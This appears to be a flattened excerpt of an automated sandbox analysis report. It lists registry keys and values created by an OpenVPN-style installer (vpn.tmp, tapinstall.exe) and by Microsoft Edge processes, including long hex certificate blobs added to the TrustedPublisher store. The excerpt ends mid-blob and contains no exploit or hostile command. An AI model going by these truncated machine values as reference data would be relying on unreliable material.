vpn.tmpMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 vpn.tmp Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000ae969c9db81261831c8b2777fb5e48bbd62d79244fdd5c4cdd7abf5d619e1e344d406c601736f12053c0e6d6e6dd4d3ce951bdee7191f67f13ff249f7a312b2c8926db58efa2c257691b2f870ded31ffcfc2e2a42c5eadea5d3887173da56b75046aacc8b4f764f9b1bab059f32d37c9eaa0904e05e4e571b4461b23a79acfdcce2aeba359d6290cb8bf7e769b3f76ebf20b8addedc2ea8e9549d470a8b092075788d2f28fdde7acfb49a92975c25317c92322b4909a54b4776250d0b387a303e9a25d0104aef47b7f7890c58d5527404309ab00fb0b8647a1af7e4f2ec08cfb579a5760d3e70e9b526c857ad69ad78c4bdb3de2a5b5b424d45147a347f995edee8e70b5f9290b3ed844f8414f30335c62baa264b7387bb53369a1e818d3957458a0965b081524c8c722379580b6825577c6b547063426980515d9aef4ee97a5c1ee3ad5f449c3781b259766eace058d411f559609497fd7de760652ccea10f8a09a32097e6734ac7d6dd26348179bb44fe54b11201788ac86ac50ad956768417dc31257ec0dd5aa9b19fc88a630295f30383666233e07dd468c72604c29a5f6e0bf655332b9 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{B6190C03-1C4B-409E-AAB0-714BB681E94E}" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node vpn.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{5068C481-81FF-4B04-BB34-AED4B23E7DC6}" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 310d9d199504d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" vpn.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe -
Processes:
tapinstall.exevpn.tmpdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae2